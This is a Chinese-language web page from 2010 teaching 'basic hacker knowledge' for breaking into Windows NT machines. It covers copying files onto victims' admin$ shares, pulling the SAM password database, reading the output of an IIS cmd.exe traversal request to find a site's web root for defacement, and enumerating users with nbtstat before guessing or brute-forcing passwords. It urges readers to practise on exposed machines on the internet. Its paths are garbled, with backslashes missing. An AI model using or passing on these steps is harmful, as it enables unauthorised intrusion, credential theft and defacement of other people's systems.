首页 电脑 电脑学堂 查看内容

黑客的基本知识

2010-5-18 14:11 561 0

摘要:     下面我说说怎样把本地的文件复制到对方硬盘上去, 需要建立好IPC$连接才有效。     这里我们把本地C盘下的index.htm复...
关键词: nbsp Registered 对方 XX PENTIUMII 就是 文件 index ORAHOTOWN UNIQUE

    下面我说说怎样把本地的文件复制到对方硬盘上去, 需要建立好IPC$连接才有效。     这里我们把本地C盘下的index.htm复制到127.0.0.1的C盘下     copy index.htm 127.0.0.1c$index.htm     ----------------------     如果你要复制到D盘下 把C改为D, 就行了!     copy index.htm 127.0.0.1d$index.htm     ----------------------     如果你要把他复制到 WINNT 目录里     就要把输入     copy index.htm 127.0.0.1admin$index.htm     admin$是winnt     ---------------------     要把对方的文件复制过来,顺便告诉大家 NT的备份的数据库放在x:winntrepairsam._ sam._是数据库的文件名     ---------------------- ----------------------     下面就把127.0.0.1的数据库复制到本地C盘下     copy 127.0.0.1admin$repairsam._ c:     这个sam._这明显是NT主机的口令档,如果是win2000机器的口令文件应该是sam     ---------------------------------------------------------------------------------------------------------------------------     6:set     如果你跑进了一部机子,而且想黑他(这思想只能在特别时候才准有),当然他的80端口要开,不然你黑给谁看。这时需要用SET命令!     下面是我得到的结果!我来分析它,只是找主页在那而已。     COMPUTERNAME=PENTIUMII     ComSpec=D:WINNTsystem32cmd.exe     CONTENT_LENGTH=0     GATEWAY_INTERFACE=CGI/1.1     HTTP_ACCEPT=*/*     HTTP_ACCEPT_LANGUAGE=zh-cn     HTTP_CONNECTION=Keep-Alive     HTTP_HOST=当前登陆者的IP,这里本来是显示我的IP,被我删除了     HTTP_ACCEPT_ENCODING=gzip, deflate     HTTP_USER_AGENT=Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)     NUMBER_OF_PROCESSORS=1     Os2LibPath=D:WINNTsystem32os2dll;     OS=Windows_NT     Path=D:WINNTsystem32;D:WINNT     PATHEXT=.COM;.EXE;.BAT;.CMD     PATH_TRANSLATED=E:vlroot主页放在的地址,只要你看到PATH_TRANSLATED=的后面就是主页的存放地址。这里是E:vlroot     PROCESSOR_ARCHITECTURE=x86     PROCESSOR_IDENTIFIER=x86 Family 6 Model 3 Stepping 3, GenuineIntel     PROCESSOR_LEVEL=6     PROCESSOR_REVISION=0303     PROMPT=$P$G     QUERY_STRING=/c+set     REMOTE_ADDR=XX.XX.XX.XX     REMOTE_HOST=XX.XX.XX.XX     REQUEST_METHOD=GET     SCRIPT_NAME=/scripts/%2f/winnt/system32/cmd.exe     SERVER_NAME=XX.XX.XX.XX     SERVER_PORT=80     SERVER_PORT_SECURE=0     SERVER_PROTOCOL=HTTP/1.1     SERVER_SOFTWARE=Microsoft-IIS/3.0对方使用IIS/3.0     SystemDrive=D:     SystemRoot=D:WINNT     TZ=GMT-9     USERPROFILE=D:WINNTProfilesDefault User     windir=D:WINNT     粉红色的那行就是对方主页存放地址,这里告诉大家一个技巧,很笨的技巧啊,不过只能用这个方法才能100%的找到主页的名称,当你DIR这个目录时,一定会看到很多文件,你可以把所有文件在浏览器这样输入XX.XX.XX.XX/文件名,这样只要看到和XX.XX.XX.XX看到的也面一模一样,那么这就是主页的名称了。     ---------------------------------------------------------------------------------------------------------------------------     7:nbtstat     如果你扫到一部NT的机子,他的136到139其中一个端口开了的话,就要用这个命令得到用户了。顺便告诉大家这是netbios,得到用户名后就可以猜猜密码了。例如比较简单的密码,密码和用户名一样的,都试下,不行就暴力破解吧!     现在网上很多NT的机子都开了这些端口的,你可以练习下,我们来分析得到的结果。     命令是     nbtstat -A XX.XX.XX.XX     -A一定要大写哦。     这个我认为大不大写没有太大差别,用处还是一样的。     之后用net use 对方IP 连接一下!     net view 对方IP 查看对方共享文件夹     net use X: IP对方共享文件 映射对方共享文件夹成为本机的X盘     这就是139端口的基本用法!不过前提是必须对方开共享!     netstat -n看看谁连接你     -----------------     下面是得到的结果。     NetBIOS Remote Machine Name Table     Name Type Status     ---------------------------------------------     Registered Registered Registered Registered Registered Registered Registered Reg     istered Registered Registered Registered     MAC Address = 00-E0-29-14-35-BA     PENTIUMII <00> UNIQUE     PENTIUMII <20> UNIQUE     ORAHOTOWN <00> GROUP     ORAHOTOWN <1C> GROUP     ORAHOTOWN <1B> UNIQUE     PENTIUMII <03> UNIQUE     INet~Services <1C> GROUP     IS~PENTIUMII…<00> UNIQUE     ORAHOTOWN <1E> GROUP     ORAHOTOWN <1D> UNIQUE     __MSBROWSE__.<01> GROUP     粉红色的就是登陆过这部系统的用户,可能你不知道怎么看,大家是不是看到了一窜数字,只要这窜数字是 <03> 的话,那他前面的就是用户。 这里的用户是PENTIUMII。     没有03说明:MAC没和IP捆在一起了
声明:文章版权归原作者所有 部分文章转自互联网 如有侵权请联系 [邮箱地址] 删除

路过

雷人

握手

鲜花

鸡蛋

最新评论

返回顶部